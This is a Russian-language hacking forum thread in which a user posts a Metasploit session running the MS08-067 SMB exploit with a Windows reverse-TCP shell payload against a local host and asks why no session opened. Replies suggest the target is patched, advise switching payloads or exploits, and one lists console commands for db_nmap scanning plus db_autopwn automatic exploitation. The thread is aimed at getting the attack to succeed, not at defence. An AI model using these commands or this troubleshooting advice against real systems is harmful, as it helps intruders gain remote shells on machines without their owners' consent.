Exploit ms08_067_netapi

Discussion in 'Песочница' started by 3dx, 10 Jan 2011.

  1. 3dx

    3dx New Member

    Joined:
    12 Sep 2009
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Вудает мне следуюшию ошибку
    Code:
    msf > use exploit/windows/smb/ms08_067_netapi
    msf > set PAYLOAD windows/shell/reverse_tcp
    msf exploit(ms08_067_netapi) > set LHOST 10.1.1.115
    msf exploit(ms08_067_netapi) > set LPORT 55555
    msf exploit(ms08_067_netapi) > set RHOST 10.1.1.15
    msf exploit(ms08_067_netapi) > exploit
    PAYLOAD => windows/shell/reverse_tcp
    LHOST => 10.1.1.115
    LPORT => 55555
    RHOST => 10.1.1.15
    
    [*] Started reverse handler on 10.1.1.115:55555 
    
    [*] Automatically detecting the target...
    
    [*] Fingerprint: Windows XP Service Pack 3 - lang:English
    
    [*] Selected Target: Windows XP SP3 English (NX)
    
    [*] Attempting to trigger the vulnerability...
    
    [*] Exploit completed, but no session was created.
    Кто то сталкивался ?
    Знает как исправить ?
     
  2. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Патч стоит.
     
  3. Vollkorn

    Vollkorn Member

    Joined:
    6 Nov 2010
    Messages:
    86
    Likes Received:
    15
    Reputations:
    -6
    Не обязательно. Может просто этот язык не поддерживает.

    //
     
    #3 Vollkorn, 11 Jan 2011
    Last edited by a moderator: 3 Mar 2011
  4. 3dx

    3dx New Member

    Joined:
    12 Sep 2009
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Что за патч ?

    запускал через msfgui
     
  5. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    651
    Likes Received:
    44
    Reputations:
    7
    Короче если не прокатывает этот сплоит, больше нефиг тыркаться, ищи другой или забей
     
  6. 3dx

    3dx New Member

    Joined:
    12 Sep 2009
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Я этого и не догоняю
    Exploit completed, but no session was created.
    Exploit прошел, но payload не сработал ?
    Или сам exploit не прошел ?
     
  7. Vollkorn

    Vollkorn Member

    Joined:
    6 Nov 2010
    Messages:
    86
    Likes Received:
    15
    Reputations:
    -6
    Это оно говорит, мол сделал всё как надо, но ничего не произошло. Посмотри для каких версий виндовс этот эксплоит. Если всё будет подходить -- попробуй сменить пэйлоуд. А если и это не поможет, то скорее всего, что система пропатчена, лучше поищи посвежее эксплоит. Успехов.
     
    1 person likes this.
  8. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    801
    Likes Received:
    145
    Reputations:
    73
    +1 или db_nmap + db_autopwn попробуй
    Этот эксплоит прокатит наверное только на SP1, что давольно редко встречается.
     
    1 person likes this.
  9. polunochnick

    polunochnick New Member

    Joined:
    6 Dec 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    В сети где-то встречал статьи по работе msf совместно с nmap... Довольно удобно... Получается инструмент для нахождения уязвимости и автоматической ее реализации... Погугли на тему msf...
     
  10. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    А что там гуглить в консоли msf
    подключить драйвер дб db_driver sqlite3
    создать таблицу db_create blabla
    старт скана db_nmap -sV localhost
    ну и автомат подбор сплойта db_autopwn -p -e.
    Вот и все ...